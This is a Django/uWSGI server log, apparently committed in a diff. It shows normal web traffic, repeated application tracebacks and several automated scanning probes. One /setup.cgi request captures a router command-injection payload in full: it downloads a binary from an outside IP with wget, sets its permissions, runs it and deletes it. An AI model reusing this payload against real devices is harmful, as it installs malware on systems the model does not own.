+[pid: 18965|app: -1|req: -1/449] 42.236.10.93 () {40 vars in 903 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/450] 42.236.10.78 () {40 vars in 901 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/451] 42.236.10.84 () {40 vars in 917 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/452] 42.236.10.78 () {40 vars in 919 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/453] 42.236.10.93 () {40 vars in 909 bytes} [Fri Jan 8 17:17:59 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/454] 42.236.10.93 () {40 vars in 960 bytes} [Fri Jan 8 17:18:00 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/455] 42.236.10.84 () {40 vars in 966 bytes} [Fri Jan 8 17:18:00 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 344/456] 42.236.10.78 () {34 vars in 788 bytes} [Fri Jan 8 17:18:11 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18965|app: 0|req: 345/457] 42.236.10.78 () {34 vars in 791 bytes} [Fri Jan 8 17:18:12 2021] GET /home/ => generated 57614 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 346/458] 42.236.10.75 () {40 vars in 875 bytes} [Fri Jan 8 17:18:12 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18965|app: 0|req: 347/459] 42.236.10.93 () {38 vars in 843 bytes} [Fri Jan 8 17:18:12 2021] GET /home/ => generated 57878 bytes in 27 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 348/460] 27.115.124.38 () {34 vars in 792 bytes} [Fri Jan 8 17:18:23 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 349/461] 27.115.124.70 () {40 vars in 878 bytes} [Fri Jan 8 17:18:25 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 350/462] 27.115.124.101 () {38 vars in 847 bytes} [Fri Jan 8 17:18:26 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/463] 27.115.124.6 () {28 vars in 445 bytes} [Fri Jan 8 17:18:28 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/464] 27.115.124.6 () {40 vars in 916 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/465] 27.115.124.6 () {40 vars in 939 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/466] 27.115.124.38 () {40 vars in 926 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/467] 27.115.124.70 () {40 vars in 901 bytes} [Fri Jan 8 17:18:28 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/468] 27.115.124.101 () {40 vars in 920 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/469] 27.115.124.70 () {40 vars in 922 bytes} [Fri Jan 8 17:18:28 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/470] 27.115.124.101 () {40 vars in 900 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/471] 27.115.124.6 () {40 vars in 916 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/472] 27.115.124.101 () {40 vars in 916 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/473] 27.115.124.6 () {40 vars in 906 bytes} [Fri Jan 8 17:18:29 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 351/474] 180.163.220.3 () {34 vars in 790 bytes} [Fri Jan 8 17:18:31 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18965|app: 0|req: 352/475] 180.163.220.67 () {34 vars in 793 bytes} [Fri Jan 8 17:18:32 2021] GET /home/ => generated 57616 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 353/476] 180.163.220.5 () {40 vars in 876 bytes} [Fri Jan 8 17:18:32 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18965|app: 0|req: 354/477] 180.163.220.4 () {38 vars in 845 bytes} [Fri Jan 8 17:18:33 2021] GET /home/ => generated 57880 bytes in 32 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/478] 27.115.124.38 () {40 vars in 961 bytes} [Fri Jan 8 17:18:38 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/479] 27.115.124.101 () {40 vars in 968 bytes} [Fri Jan 8 17:18:38 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/480] 27.115.124.6 () {28 vars in 446 bytes} [Fri Jan 8 17:18:41 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/481] 27.115.124.101 () {28 vars in 448 bytes} [Fri Jan 8 17:18:44 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 355/482] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 17:21:01 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 356/483] 119.45.190.53 () {22 vars in 234 bytes} [Fri Jan 8 17:24:42 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html/
+[pid: 18965|app: 0|req: 357/484] 119.45.190.53 () {24 vars in 302 bytes} [Fri Jan 8 17:24:42 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 358/485] 83.97.20.21 () {26 vars in 277 bytes} [Fri Jan 8 18:04:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 359/486] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 18:49:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 18965|app: 0|req: 360/487] 83.97.20.21 () {22 vars in 227 bytes} [Fri Jan 8 18:49:35 2021] OPTIONS / => generated 52541 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 18965|app: 0|req: 361/488] 83.97.20.21 () {22 vars in 224 bytes} [Fri Jan 8 18:49:45 2021] HEAD / => generated 52526 bytes in 22 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0)
+[uwsgi-http key: VM-0-13-centos client_addr: 83.97.20.21 client_port: 20850] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[pid: 18965|app: 0|req: 362/489] 139.162.79.87 () {30 vars in 337 bytes} [Fri Jan 8 19:15:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 363/490] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 19:33:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 364/491] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 20:17:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /goform/setUsbUnload/
+[pid: 18965|app: 0|req: 365/492] 205.185.116.160 () {44 vars in 760 bytes} [Fri Jan 8 20:18:28 2021] POST /goform/setUsbUnload/ => generated 3418 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 366/493] 116.233.88.102 () {26 vars in 289 bytes} [Fri Jan 8 20:29:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 367/494] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 21:00:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /tmUnblock.cgi
+[pid: 18965|app: 0|req: 368/495] 181.143.101.194 () {36 vars in 463 bytes} [Fri Jan 8 21:13:38 2021] POST /tmUnblock.cgi => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 369/496] 83.97.20.34 () {26 vars in 277 bytes} [Fri Jan 8 21:25:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /Telerik.Web.UI.WebResource.axd
+[pid: 18965|app: 0|req: 370/497] 193.118.53.194 () {30 vars in 515 bytes} [Fri Jan 8 21:53:29 2021] GET /Telerik.Web.UI.WebResource.axd?type=rau => generated 3463 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /http:/example.com/
+[pid: 18965|app: 0|req: 371/498] 64.31.8.10 () {28 vars in 346 bytes} [Fri Jan 8 21:55:02 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 4823] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+Not Found: /dnspod.qcloud.com:443
+[pid: 18965|app: 0|req: 372/499] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 21:55:02 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /http:/110.242.68.4/
+[pid: 18965|app: 0|req: 373/500] 112.193.169.8 () {40 vars in 809 bytes} [Fri Jan 8 21:55:03 2021] HEAD http://110.242.68.4/ => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /dnspod.qcloud.com:443
+[pid: 18965|app: 0|req: 374/501] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 22:16:47 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 65240] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+Not Found: /http:/example.com/
+[pid: 18965|app: 0|req: 375/502] 64.31.8.10 () {28 vars in 347 bytes} [Fri Jan 8 22:20:13 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /dnspod.qcloud.com:443
+[pid: 18965|app: 0|req: 376/503] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 22:20:13 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 377/504] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 22:23:44 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 378/505] 65.60.11.210 () {30 vars in 436 bytes} [Fri Jan 8 22:28:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /http:/example.com/
+[pid: 18965|app: 0|req: 379/506] 64.31.8.10 () {28 vars in 347 bytes} [Fri Jan 8 22:51:09 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 61568] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+Not Found: /dnspod.qcloud.com:443
+[pid: 18965|app: 0|req: 380/507] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 22:51:10 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 381/508] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 23:00:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 382/509] 180.160.69.32 () {36 vars in 654 bytes} [Fri Jan 8 23:05:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/510] 180.160.69.32 () {38 vars in 775 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/511] 180.160.69.32 () {38 vars in 753 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/512] 180.160.69.32 () {38 vars in 755 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/513] 180.160.69.32 () {38 vars in 757 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/514] 180.160.69.32 () {38 vars in 734 bytes} [Fri Jan 8 23:05:39 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/515] 180.160.69.32 () {38 vars in 736 bytes} [Fri Jan 8 23:05:39 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/516] 180.160.69.32 () {38 vars in 752 bytes} [Fri Jan 8 23:05:40 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/517] 180.160.69.32 () {38 vars in 742 bytes} [Fri Jan 8 23:05:41 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/518] 180.160.69.32 () {38 vars in 761 bytes} [Fri Jan 8 23:05:41 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/519] 180.160.69.32 () {38 vars in 750 bytes} [Fri Jan 8 23:05:41 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/520] 180.160.69.32 () {38 vars in 807 bytes} [Fri Jan 8 23:05:43 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: 0|req: 383/521] 113.96.232.119 () {32 vars in 486 bytes} [Fri Jan 8 23:11:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 384/522] 83.97.20.29 () {26 vars in 278 bytes} [Fri Jan 8 23:22:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 385/523] 212.64.18.182 () {28 vars in 321 bytes} [Fri Jan 8 23:38:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 386/524] 189.0.37.25 () {28 vars in 401 bytes} [Fri Jan 8 23:41:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 387/525] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 23:42:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /setup.cgi
+[pid: 18965|app: 0|req: 388/526] 178.153.110.59 () {28 vars in 818 bytes} [Sat Jan 9 00:02:05 2021] GET /setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%20http://185.248.102.144/bins/Packets.mips%20-O%20/var/tmp/Packets.mips;%20chmod%20777%20/var/tmp/Packets.mips;%20/var/tmp/Packets.mips => generated 3575 bytes in 4 msecs (NetgearRep;%20rm%20-rf%20/var/tmp/Packets.mips&curpath=/¤tsetting.htm=1 HTTP/1.1 404) 5 headers in 237 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 389/527] 83.97.20.34 () {26 vars in 278 bytes} [Sat Jan 9 00:11:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 390/528] 114.87.230.234 () {38 vars in 929 bytes} [Sat Jan 9 00:18:21 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/529] 114.87.230.234 () {40 vars in 973 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/530] 114.87.230.234 () {40 vars in 951 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/531] 114.87.230.234 () {40 vars in 955 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/532] 114.87.230.234 () {40 vars in 953 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/533] 114.87.230.234 () {40 vars in 959 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/534] 114.87.230.234 () {40 vars in 934 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/535] 114.87.230.234 () {40 vars in 932 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/536] 114.87.230.234 () {40 vars in 950 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/537] 114.87.230.234 () {40 vars in 948 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 12639] hr_write(): Connection reset by peer [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 21343] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 56158] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 22111] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[pid: 18965|app: 0|req: 391/538] 114.87.230.234 () {40 vars in 1018 bytes} [Sat Jan 9 00:18:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/539] 114.87.230.234 () {40 vars in 951 bytes} [Sat Jan 9 00:18:26 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/540] 114.87.230.234 () {40 vars in 959 bytes} [Sat Jan 9 00:18:26 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/541] 114.87.230.234 () {40 vars in 932 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/542] 114.87.230.234 () {40 vars in 948 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/543] 114.87.230.234 () {40 vars in 940 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
